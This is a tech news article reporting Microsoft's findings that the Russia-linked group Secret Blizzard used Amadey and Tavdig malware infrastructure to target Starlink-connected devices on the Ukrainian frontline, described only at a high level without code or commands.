Microsoft confirms Ukrainian frontline was hit with hacks traced back to Russia

Hackers connected to the Russian government launched a cyberattack against Starlink-connected devices being used on the Ukrainian frontline.

Microsoft confirms Ukrainian frontline was hit with hacks traced back to Russia
Comment IconFacebook IconX IconReddit Icon
Tech and Science Editor
Published
2 minutes read time
TL;DR: Hackers linked to the Russian government targeted Starlink-connected devices on the Ukrainian frontline in a cyberattack.

A group of hackers connected to the Russian government have launched cyber attacks at Starlink-connected infrastructure in Ukraine to target devices being used by Ukrainian soldiers on the frontline. Microsoft has confirmed the infrastructure has been compromised, and currently, investigators still don't know what vulnerability was exploited.

Microsoft confirms Ukrainian frontline was hit with hacks traced back to Russia 879798

Microsoft has labeled the group as "Secret Blizzard," and according to reports and the latest Microsoft Security blog post, in at least one instance this year when Ukrainian frontline devices were targeted, Secret Blizzard used infrastructure created by a cybercrime group Microsoft tracks as Storm-1919. In another instance,e Secret Blizzard leveraged infrastructure from another group called Storm-1837, a Russian-based cybercrime group that targets Ukrainian drone operations.

So, how did they gain access to the infrastructure? Microsoft explains the cybercriminals between March and April this year used a bot swarm attack to install the XMRIG cryptocurrency app on targeted servers. Typically, hackers will install this malware and then use the device's resources to mine a cryptocurrency, which they then sell online for real money. However, Microsoft writes the ultimate objective of bot swarm malware was to install Tavdig, a backdoor Secret Blizzard used to conduct reconnaissance on the target device.

Microsoft explains when Secret Blizzard identifies an individual as a high-value target, it deploys the Tavdig backdoor and collects valuable user information such as browser passwords, user information, netstat, installed patches, registry settings, and more.

"Microsoft assesses that Secret Blizzard either used the Amadey malware as a service (MaaS) or accessed the Amadey command-and-control (C2) panels surreptitiously to download a PowerShell dropper on target devices," Microsoft said. "The PowerShell dropper contained a Base64-encoded Amadey payload appended by code that invoked a request to Secret Blizzard C2 infrastructure."

Adding, Tavdig would also result in additional reconnaissance software being installed on devices "of further interest by the threat actor-for example, devices egressing from STARLINK IP addresses, a common signature of Ukrainian front-line military devices."

Photo of the NA
Best Deals: NA
Country flag Today 7 days ago 30 days ago
$119.99 USD $119.99 USD
Buy
- $138.98 USD
Buy
$200.81 CAD $197 CAD
Buy
$189.99 CAD -
Buy
$119.99 USD $119.99 USD
Buy
$119.99 USD $119.99 USD
Buy
* Prices last scanned on 1/22/2025 at 9:45 am CST - prices may not be accurate, click links above for the latest price. We may earn an affiliate commission from any sales.
NEWS SOURCE:microsoft.com

Tech and Science Editor

Email IconX IconLinkedIn Icon

Jak joined the TweakTown team in 2017 and has since reviewed 100s of new tech products and kept us informed daily on the latest science, space, and artificial intelligence news. Jak's love for science, space, and technology, and, more specifically, PC gaming, began at 10 years old. It was the day his dad showed him how to play Age of Empires on an old Compaq PC. Ever since that day, Jak fell in love with games and the progression of the technology industry in all its forms.

Related Topics

Newsletter Subscription